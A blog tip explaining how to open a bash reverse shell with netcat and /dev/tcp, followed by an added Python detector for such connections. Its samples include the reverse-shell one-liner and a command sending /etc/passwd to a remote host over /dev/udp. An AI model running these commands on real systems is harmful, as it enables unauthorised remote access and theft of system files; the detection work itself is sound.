Tuesday, March 28, 2017

Tip: Quick and dirty reverse remote shell

Here is how to get a reverse remote shell. I say reverse because the remote system is connecting to you. I'll demonstrate it on a single machine for simplicity. So, open a terminal and run the following command in it:
nc -l 12345
This will start netcat, which will listen on port 12345. Then, in a second terminal, run the following command (the inner command must be quoted so that the redirections are applied by the inner bash, and the port must match the one netcat listens on):
/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1'
You won't notice anything in the first window where the nc command is running, but try to enter some command there, e.g. pwd. :) What you've got is a remote shell. Obviously, because of the way things work you don't get a prompt and other fancy stuff, but it works and that's what's important. :)

What you basically did is run an interactive bash process (the option -i) with standard output and standard error redirected to /dev/tcp/127.0.0.1/12345 (the redirection operator >&), and standard input redirected from the same file as well (the last 0>&1, which makes file descriptor 0 a copy of file descriptor 1, i.e. the socket). The file being redirected to and from is a special notation that the bash shell interprets by opening a network connection instead of a file, i.e. the syntax is:
/dev/<protocol>/<ipaddress>/<port>
More details can be found in the bash manual page, in the section on redirections.
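From the defender's side, the same /dev/<protocol>/<host>/<port> notation is what you look for when hunting for this kind of shell. The following is an added example, not part of the original post: it scans process command lines (as you would collect them from auditd EXECVE records or `ps -eo args`) for the pseudo-device path next to a redirection operator and reports where the shell would connect. The command lines are constructed for illustration; bash also accepts a hostname in the host field, not only an IP address.

```python
"""Detect bash /dev/tcp and /dev/udp pseudo-device use in process command lines.

Added example for the post above (not the author's code). SAMPLE_CMDLINES is a
constructed set of command lines standing in for auditd or ps output.
"""
import re
from typing import Dict, List, Tuple

# The pseudo-device path that bash turns into a network connection:
# /dev/<tcp|udp>/<host>/<port>. Host may be an IP or a hostname, port a
# number or a service name, so both fields are matched loosely.
DEV_NET_RE = re.compile(r"/dev/(tcp|udp)/([A-Za-z0-9.\-:]+)/([A-Za-z0-9\-]+)")
# A redirection operator directly in front of the path, as in the post's
# command (>&), or the exec 3<> form often used for the same purpose.
REDIRECT_RE = re.compile(r"(>&|&>|<>|<|>)\s*/dev/(tcp|udp)/")

SAMPLE_CMDLINES = [  # constructed sample data
    "/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1'",
    "bash -c 'exec 3<>/dev/tcp/10.0.0.5/80; echo >&3'",
    "grep -r /dev/tcp /usr/share/doc",          # mentions the path, no connection
    "/usr/bin/python3 /opt/app/worker.py --port 8080",
    "sh -c 'cat /etc/passwd > /dev/udp/192.0.2.9/53'",
]


def find_dev_net(cmdline: str) -> List[Dict[str, object]]:
    """Return one finding per /dev/tcp or /dev/udp path found in cmdline."""
    findings = []
    redirected = bool(REDIRECT_RE.search(cmdline))
    for m in DEV_NET_RE.finditer(cmdline):
        proto, host, port = m.groups()
        findings.append(
            {"protocol": proto, "host": host, "port": port, "redirected": redirected}
        )
    return findings


def scan(cmdlines: List[str]) -> List[Tuple[int, Dict[str, object]]]:
    """Scan a list of command lines; return (index, finding) pairs to alert on."""
    alerts = []
    for idx, line in enumerate(cmdlines):
        for finding in find_dev_net(line):
            alerts.append((idx, finding))
    return alerts


if __name__ == "__main__":
    for idx, f in scan(SAMPLE_CMDLINES):
        flag = "REDIRECTED" if f["redirected"] else "path only"
        print(f"line {idx}: {f['protocol']} -> {f['host']}:{f['port']} ({flag})")
```

Only the lines where the path sits behind a redirection operator are real connection attempts; the grep line is reported by neither function because the path there has no host and port components.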
